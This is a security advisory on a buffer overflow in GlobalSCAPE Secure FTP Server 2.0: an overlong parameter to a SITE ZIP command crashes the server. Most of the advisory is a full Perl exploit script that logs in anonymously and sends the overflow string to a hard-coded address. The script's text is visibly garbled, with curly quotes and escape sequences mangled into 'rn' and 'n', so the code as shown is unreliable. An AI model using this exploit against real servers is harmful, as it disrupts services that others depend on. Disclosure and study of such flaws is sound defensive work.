‘GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)’

Summary

‘A vulnerability in GlobalSCAPE Secure FTP Server allows a user issuing a long parameter (around 252 bytes) as a value for a SITE command, to cause the server to try and write to a value that is outside the memory location of the Secure FTP Server’s memory. This in will cause an exception to be triggered (an un-handled exception), which causes the program to crash.’

Credit:

‘SecurITeam would like to thank STORM for finding this vulnerability.’


Details

Vulnerable Systems:
 * GlobalSCAPE Secure FTP Server version 2.0 Build 03.11.2004.2

Immune Systems:
 * GlobalSCAPE Secure FTP Server version 2.0 Build 03.16.2004.1

Exploit:
To demonstrate this issue we will use the SITE ZIP command, even though SITE ZIP isn’t a supported command, and will use SITE ZIP’s parameter ‘/d:’ provided after that command gets parsed, which causes the vulnerability.

#!/usr/bin/perl

use IO::Socket;

$host = ‘192.168.1.243’;

$remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $host, PeerPort => ‘2117’);

unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }

print ‘connectedn’;
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}

$remote->autoflush(1);

my $ftp = ‘USER anonymousrn’;

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join(”, ‘PASS ‘, ‘a@b.com’, ‘rn’);
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

$ftp = join (”, ‘SITE ZIP /d:’, ‘A’x(252), ‘rn’);

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;’

Categories: Windows